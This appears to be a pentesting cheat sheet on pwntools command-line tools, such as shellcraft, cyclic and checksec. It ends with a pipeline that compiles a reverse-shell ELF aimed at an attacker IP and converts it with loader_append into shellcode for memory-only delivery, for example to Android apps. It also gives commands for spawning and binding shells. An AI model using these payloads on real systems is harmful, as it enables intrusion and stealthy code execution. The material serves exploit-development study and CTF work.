# PwnTools {{#include ../../../banners/hacktricks-training.md}} ``` pip3 install pwntools ``` ## Pwn asm Get **opcodes** from line or file. ``` pwn asm "jmp esp" pwn asm -i ``` **Can select:** - output type (raw,hex,string,elf) - output file context (16,32,64,linux,windows...) - avoid bytes (new lines, null, a list) - select encoder debug shellcode using gdb run the output ## **Pwn checksec** Checksec script ``` pwn checksec ``` ## Pwn constgrep ## Pwn cyclic Get a pattern ``` pwn cyclic 3000 pwn cyclic -l faad ``` **Can select:** - The used alphabet (lowercase chars by default) - Length of uniq pattern (default 4) - context (16,32,64,linux,windows...) - Take the offset (-l) ## Pwn debug Attach GDB to a process ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` **Can select:** - By executable, by name or by pid context (16,32,64,linux,windows...) - gdbscript to execute - sysrootpath ## Pwn disablenx Disable nx of a binary ``` pwn disablenx ``` ## Pwn disasm Disas hex opcodes ``` pwn disasm ffe4 ``` **Can select:** - context (16,32,64,linux,windows...) - base addres - color(default)/no color ## Pwn elfdiff Print differences between 2 files ``` pwn elfdiff ``` ## Pwn hex Get hexadecimal representation ```bash pwn hex hola #Get hex of "hola" ascii ``` ## Pwn phd Get hexdump ``` pwn phd ``` **Can select:** - Number of bytes to show - Number of bytes per line highlight byte - Skip bytes at beginning ## Pwn pwnstrip ## Pwn scrable ## Pwn shellcraft Get shellcodes ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` **Can select:** - shellcode and arguments for the shellcode - Out file - output format - debug (attach dbg to shellcode) - before (debug trap before code) - after - avoid using opcodes (default: not null and new line) - Run the shellcode - Color/no color - list syscalls - list possible shellcodes - Generate ELF as a shared library ## Pwn template Get a python template ``` pwn template ``` **Can select:** host, port, user, pass, path and quiet ## Pwn unhex From hex to string ``` pwn unhex 686f6c61 ``` ## Pwn update To update pwntools ``` pwn update ``` ## ELF → raw shellcode packaging (loader_append) Pwntools can turn a standalone ELF into a single raw shellcode blob that self‑maps its segments and transfers execution to the original entrypoint. This is ideal for memory‑only loaders (e.g., Android apps invoking JNI to execute downloaded bytes). Typical pipeline (amd64 example) 1) Build a static, position‑independent payload ELF (musl recommended for portability): ```bash musl-gcc -O3 -s -static -o exploit exploit.c \ -DREV_SHELL_IP="\"10.10.14.2\"" -DREV_SHELL_PORT="\"4444\"" ``` 2) Convert ELF → shellcode with pwntools: ```python # exp2sc.py from pwn import * context.clear(arch='amd64') elf = ELF('./exploit') sc = asm(shellcraft.loader_append(elf.data, arch='amd64')) open('sc','wb').write(sc) print(f"ELF size={len(elf.data)} bytes, shellcode size={len(sc)} bytes") ``` 3) Deliver sc to a memory loader (e.g., via HTTP[S]) and execute in‑process. Notes - loader_append embeds the original ELF program into the shellcode and emits a tiny loader that mmaps the segments and jumps to the entry. - Be explicit about the architecture via context.clear(arch=...). arm64 is common on Android. - Keep your payload’s code position‑independent and avoid assumptions about process ASLR/NX. ## References - [Pwntools](https://docs.pwntools.com/en/stable/) - [CoRPhone – ELF→shellcode pipeline used for Android in-memory execution](https://github.com/0xdevil/corphone) {{#include ../../../banners/hacktricks-training.md}}